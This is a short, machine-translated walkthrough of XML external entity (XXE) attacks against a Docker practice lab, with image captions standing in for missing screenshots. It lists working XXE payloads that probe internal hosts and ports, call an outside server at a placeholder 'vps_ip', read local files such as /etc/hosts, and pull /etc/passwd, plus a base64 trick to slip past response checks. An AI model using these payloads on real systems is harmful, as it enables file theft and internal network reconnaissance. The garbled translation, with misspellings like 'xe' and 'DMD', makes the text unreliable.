xeを利用してlinuxシステムのpasswdを取得する.


外部DMDファイルを参照して、イントラネットホスト/ポートにアクセスします.<!DOCTYPE a SYSTEM "http://127.0.0.1:2333"> ( )外部DMDファイルを引用してwaiネットワークにアクセスする.<!DOCTYPE a SYSTEM "http://vps_ip" >内部エンティティを参照します.<!DOCTYPE a [<!ENTITY xxe "findneo">]><a>&xxe;</a>外部エンティティはローカルファイルを読みます.<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///etc/hosts">]><a>&xxe;</a>外部エンティティは内wangホストポートにアクセスする.<!DOCTYPE a SYSTEM "http://192.168.1.2:80">( )外部実体はwai網にアクセスする.<!DOCTYPE a [<!ENTITY xxe SYSTEM "http://vps_ip">]><a>&xxe;</a>dockerからRDodrigo/xelabをダウンロードしました.
起動:docker run-d-p 8082:80 rrodrigo/xelab
利用xxe获取linux系统的passwd_第1张图片
登録パッケージをキャプチャしたら、xml形式で転送され、メールボックスが戻ってきます.
利用xxe获取linux系统的passwd_第2张图片
戻る内容をxe回顕設定して読み込み/etc/passwdを設定します.
>>
利用xxe获取linux系统的passwd_第3张图片
base 64コードを利用してxeを行い、バックパックの検証があることを防止する.
>>
利用xxe获取linux系统的passwd_第4张图片はbase 64パケットに戻り、base 64は復号する.
利用xxe获取linux系统的passwd_第5张图片